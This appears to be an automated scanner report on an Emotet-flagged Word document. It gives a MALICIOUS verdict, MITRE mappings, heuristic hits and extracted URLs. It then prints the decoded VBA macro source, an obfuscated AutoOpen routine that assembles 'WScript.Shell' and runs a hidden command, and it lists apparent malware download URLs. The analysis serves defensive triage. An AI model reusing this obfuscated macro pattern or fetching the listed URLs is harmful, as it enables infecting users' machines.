Verdict: MALICIOUS (risk score: 290)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, and the ClamAV signature specifically identifies it as Emotet. The VBA code attempts to construct the string 'WscRipt.sHeLl' and likely uses it to download and execute a second-stage payload from the embedded URLs.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6818423-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6818423-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  End Select IndustrialToolsHealth43 = "" + Planner94 + backingup15 + "WscRipt.sHeLl" + USB15 + ErgonomicSoftHat98 + Directives39 Select Case metrics60
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  End Select strategic38 = Array(Yen36, Administrator66, Technician3, CreateObject("" + Accountability21 + neural56 + intangible60 + IndustrialToolsHealth43).Run!("" + Denmark84 + Futureproofed61 + Associate63 + Concrete21.TextBox1 + Rubber14 + CreditCardAccount87 + eservices10 + architectures99, iDBRTHsrUdw), Strategist92, bus96, KidsGames76) Select Case deposit37
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Attribute VB_Name = "District83" Sub autoopen() deposit18 = worldclass65
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs:
  - http://waliwalo.com/Y6o7VhuKPU@http://advantechnologies.com/fTkdPAD@http://www.emmanu (in document text, OLE body)
  - http://affinity7.com/SM93gJVMw@http://titheringtons.com/85qJTUNyL (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5036 bytes |

SHA-256: a2adc0701bf705bbb20b744fcbdd6fd3468bdfe8c20c3e8579e3f2946bf44ed0

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Concrete21"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "functionalities83"
Function National16()
On Error Resume Next
Select Case primary62
Case 871
purple60 = CLng(742)
hack84 = AutoLoanAccount10
webreadiness39 = CDate(capacitor31)
invoice73 = quantify39
CheckingAccount38 = Int(783)
Case 882
Berkshire30 = eyeballs14
Ergonomic50 = Cos(Identity45)
Industrial86 = deposit15
Assurance5 = ChrB(175)
seamless53 = knowledgebase14
End Select
Select Case Metal57
Case 105
Global14 = CLng(98)
HandmadeCottonKeyboard57 = bypassing30
Corporate34 = CDate(leverage96)
scale36 = deploy32
ClothingBooks1 = Int(594)
Case 248
Buckinghamshire37 = reboot39
Rubber76 = Cos(application81)
webservices29 = Berkshire54
deliverables5 = ChrB(247)
Plastic46 = Web22
End Select
IndustrialToolsHealth43 = "" + Planner94 + backingup15 + "WscRipt.sHeLl" + USB15 + ErgonomicSoftHat98 + Directives39
Select Case metrics60
Case 858
transmit24 = CLng(400)
override32 = virtual65
Camp78 = CDate(withdrawal20)
withdrawal45 = Customizable61
Buckinghamshire38 = Int(664)
Case 600
GenericSteelChair7 = Manager45
USDollar10 = Cos(THX35)
PracticalRubberCheese27 = HandmadeRubberGloves85
throughput38 = ChrB(129)
calculate91 = emarkets44
End Select
Select Case objectoriented57
Case 698
NewMexico36 = CLng(630)
Fresh13 = Sleek50
Unbranded62 = CDate(Ohio28)
SDD73 = cyan10
modular93 = Int(614)
Case 604
Australia16 = driver78
Awesome44 = Cos(SleekGraniteHat14)
copying23 = bluetooth96
Movies34 = ChrB(662)
Creative35 = SmallRubberChicken67
End Select
Select Case FantasticFreshHat95
Case 16
Soft24 = CLng(787)
synergistic11 = utilisation2
Throughway76 = CDate(valueadded54)
mobile10 = connecting81
Markets71 = Int(941)
Case 600
Multichannelled32 = w4thgeneration16
Plaza97 = Cos(NorthKoreanWon52)
GenericWoodenPants15 = withdrawal27
deposit36 = ChrB(341)
users13 = parsing33
End Select
iDBRTHsrUdw = 0
Select Case Gorgeous40
Case 541
deposit58 = CLng(225)
Point18 = realtime99
payment89 = CDate(Frozen99)
payment7 = Engineer74
Intelligent26 = Int(415)
Case 643
Village58 = dynamic67
Metal17 = Cos(relationships21)
CheckingAccount50 = mobile60
productivity93 = ChrB(122)
InvestmentAccount77 = LicensedPlasticCheese99
End Select
Select Case optical74
Case 927
paradigms31 = CLng(903)
lime51 = Frozen69
PersonalLoanAccount85 = CDate(Shoes42)
Tenge16 = granular81
PracticalWoodenSausages82 = Int(265)
Case 389
methodology75 = magenta72
olive45 = Cos(ElectronicsToys44)
maximize39 = intuitive3
Islands16 = ChrB(12)
Kansas67 = Prairie97
End Select
strategic38 = Array(Yen36, Administrator66, Technician3, CreateObject("" + Accountability21 + neural56 + intangible60 + IndustrialToolsHealth43).Run!("" + Denmark84 + Futureproofed61 + Associate63 + Concrete21.TextBox1 + Rubber14 + CreditCardAccount87 + eservices10 + architectures99, iDBRTHsrUdw), Strategist92, bus96, KidsGames76)
Select Case deposit37
Case 894
Concrete43 = CLng(882)
framework18 = Oregon96
navigate68 = CDate(copy70)
BabyIndustrial39 = Frozen77
z1080p85 = Int(850)
Case 939
National65 = webenabled30
Fields7 = Cos(unleash72)
SmallRubberComputer44 = seamless22
Legacy31 = ChrB(16)
connecting9 = Nigeria58
End Select
Select Case Product43
Case 332
Dynamic47 = CLng(583)
CheckingAccount12 = Consultant25
Oregon25 = CDate(quantifying49)
Markets8 = Virginia13
GenericGraniteKeyboard26 = Int(265)
Case 783
auxiliary68 = Assistant92
Dam27 = Cos(Divide37)
Handmade37 = synthesizing52
productivity20 = ChrB(977)
pixel18 = GB39
End Select
End Function
Attribute VB_Name = "District83"
Sub autoopen()
deposit18 = worldclass65
Rupiah62 = Array(Haiti24, TunisianDinar26, logistical62, National16, extensible65, program55, approach1)
Multichannelled21 = invoice2
End Sub
Function TurkishLira1()
HTTP78 = strategic61
End Function